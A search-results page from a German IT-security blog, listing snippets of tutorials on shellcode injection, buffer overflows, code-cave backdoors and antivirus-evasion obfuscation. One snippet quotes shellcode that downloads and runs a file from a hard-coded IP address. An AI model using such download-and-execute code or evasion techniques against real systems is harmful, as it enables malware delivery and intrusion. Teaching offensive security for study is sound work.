NoSociety.de

#nosoc

  • Seiten-Werkzeuge
    Seite anzeigenÄltere VersionenLinks hierher
  • Webseiten-Werkzeuge
    Letzte ÄnderungenMedien-ManagerÜbersicht
  • Benutzer-Werkzeuge
    Anmelden

Suche

Unten sind die Ergebnisse Ihrer Suche gelistet.

Enthält
  • Genaue Treffer
  • Beginnt mit
  • Endet mit
  • Enthält
@it-security:blog
  • Alle Namensräume
Jederzeit
  • Jederzeit
  • Letzte Woche
  • Letzter Monat
  • letztes Jahr
Sortiere nach Treffer
  • Sortiere nach Treffer
  • Sortiere nach letzter Änderung

Volltextergebnisse:

FatCat Attack PoC
16 Treffer, Zuletzt geändert: vor 15 Monaten
:**Weaponization** | Exploit, Payload | msfvenom((https://github.com/ksanchezcld/Hacking_Cheat_Sheet/blo... elivery** | Physical access, Injection | Flipper((https://flipperzero.one/)), BadUSB((https://grantonline.medium.com/flipper-zero-badusb-getting-started-with-... dec)) | | ::: | Bypass | PowerShell Restrictions((https://www.netspi.com/blog/technical/network-penetrat
Shellcode Injection Teil 4
15 Treffer, Zuletzt geändert: vor 10 Monaten
ite, welche ich gerne als Referenz genutzt habe.((https://help.x64dbg.com/en/latest/commands/index.html ... lfreiche Tools ==== * Microsoft Visual Studio((https://visualstudio.microsoft.com/de/downloads/)) * x64dbg((https://x64dbg.com/)) * PEView((http://wjradburn.com/software/)) * ShenCode((https://github.com/psycore8
Buffer Overflow im 64-Bit Stack - Teil 2
13 Treffer, Zuletzt geändert: vor 11 Monaten
chen wir, indem der auszuführende Befehl an die [[https://de.wikipedia.org/wiki/C-Standard-Bibliothek|li... gend basiert dieses Tutorial auf der Arbeit von [[https://blog.techorganic.com|superkojiman]] ((https://blog.techorganic.com/2015/04/21/64-bit-linux-stack-sma... Overflows gibt es in der Linksammlung am Ende. ((https://book.hacktricks.xyz/reversing-and-exploiting/l
Shellcode Injection Teil 3
9 Treffer, Zuletzt geändert: vor 12 Monaten
de Injection nutzen können, um eine Datei mittels HTTP zu laden und anschließend auszuführen. \\ \\ ====... } } </code> Den kompletten Code findet Ihr im [[https://github.com/psycore8/nosoc-shellcode/tree/main/... gut dokumentierten Assembler Code finden wir im [[https://github.com/stephenbradshaw/shellcode/blob/mast... WindowsAgent.py", 0 ;Zeile 192 / Unsere URL db "http://172.26.72.38/nat.zip", 0 </code> \\ \\ === Shel
Buffer Overflow im 64-Bit Stack - Teil 1
8 Treffer, Zuletzt geändert: vor 11 Monaten
uf dem 64-Bit Stack, um root Rechte zu erlangen.((https://www.ired.team/offensive-security/code-injectio... ten zu Buffer-Overflows, Stack etc. gibt es hier((https://medium.com/@buff3r/basic-buffer-overflow-on-64... m hilfreiche Kommandos, zur Exploit Entwicklung.((https://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.git ~/peda echo "source
Buffer Overflow im 64-Bit Stack - Teil 3
7 Treffer, Zuletzt geändert: vor 4 Monaten
jedem Programmneustart. Superkojiman beschreibt [[https://blog.techorganic.com|in seinem Blog]] ausführl... eses Prinzip können wir uns nun zu Nutze machen.((https://ir0nstone.gitbook.io/notes/types/stack/aslr/pl... ster/binaries/linux/x86_64/socat]] * pwntools ((https://docs.pwntools.com/en/stable/install.html)) <c... Github]] verfügbar. <file c bof-part3.c> /* Code https://blog.techorganic.com/2016/03/18/64-bit-linux-s
Backdoor development with Code Caves
6 Treffer, Zuletzt geändert: vor 5 Monaten
**code cave** is a series of unused bytes in a [[https://en.wikipedia.org/wiki/Process_(computing)|proc... has capacity for injecting custom instructions.((https://en.wikipedia.org/wiki/Code_cave )) ==== 2.1 F... r free bytes in our putty.exe. For this, we use [[https://github.com/EgeBalci/Cminer|Cminer]]: <code sh... ''%%.rsrc%%'' to execute our payload: - Open [[https://ntcore.com/explorer-suite/|CFF Explorer]] -
Shellcode Injection Teil 1
6 Treffer, Zuletzt geändert: vor 10 Monaten
omit tarnen. Das machen wir mit dem Tool jigsaw ((https://github.com/RedSiege/Jigsaw)) und dem Framework... rdatei mit jedem Vorgang anders aussehen lässt. ((https://0xpat.github.io/Malware_development_part_6/))((https://www.fo-sec.com/articles/10-defender-bypass-methods#3)) Hierzu laden wir uns [[https://github.com/fritzone/obfy|Obfy]] herunter, bind
Shellcode Injection Teil 2
5 Treffer, Zuletzt geändert: vor 10 Monaten
s wie in Teil 1 ein. Den Quellcode könnt ihr im [[https://github.com/psycore8/nosoc-shellcode|Github Rep... Hierzu benutzen wir ein python Script, welches [[https://www.bordergate.co.uk/function-name-hashing/|in... \\ ==== Jigsaw ==== In Teil 1 habe ich Jigsaw ((https://github.com/RedSiege/Jigsaw )) benutzt, um den ... \ ==== Obfy ==== Jigsaw in Verbindung mit Obfy ((https://github.com/fritzone/obfy )) war direkt ein Erf
Obfuscation: ByteSwapping
3 Treffer, Zuletzt geändert: vor 7 Monaten
poly.o </code> Das Bereinigen erledige ich mit [[https://github.com/psycore8/shencode|ShenCode]]: <cod... tten Shellcode findet Ihr hier: * Shellcode: [[https://github.com/psycore8/Shellcodes/blob/main/SwapBytes/poly2.asm|poly2.asm]] * [[https://github.com/psycore8/shencode|ShenCode]] ----
Obfuscation: polymorpher In-Memory Decoder
3 Treffer, Zuletzt geändert: vor 9 Monaten
XOR-Decoder ===== Den XOR-Decoder habe ich von [[https://www.doyler.net/security-not-included/shellcode... zu können. Hierzu nutze ich mein ShellCode-Tool [[https://github.com/psycore8/shencode|ShenCode]]: <cod... infachen, habe ich den XOR-Stub als Template in [[https://github.com/psycore8/shencode|ShenCode]] integr
Obfuscation: Shellcode als UUIDs tarnen
2 Treffer, Zuletzt geändert: vor 10 Monaten
es in ein String-Array umzuwandeln, welches mit [[https://de.wikipedia.org/wiki/Universally_Unique_Ident... == Der Encoder ist Teil meines Shellcode-Tools [[https://github.com/psycore8/shencode|ShenCode]], welch
Die Bedeutung von Awareness in der IT-Sicherheit
1 Treffer, Zuletzt geändert: vor 15 Monaten
schnell auf Gefahren reagieren zu können. ---- [[https://pixabay.com/de/users/geralt-9301/?utm_source=l
Privilegien-Eskalation: Windows-Admin dank Linux
1 Treffer, Zuletzt geändert: vor 15 Monaten
nutzen. Ich habe mich für Lubuntu entschieden: [[https://lubuntu.me/downloads/]] Nach dem Download müs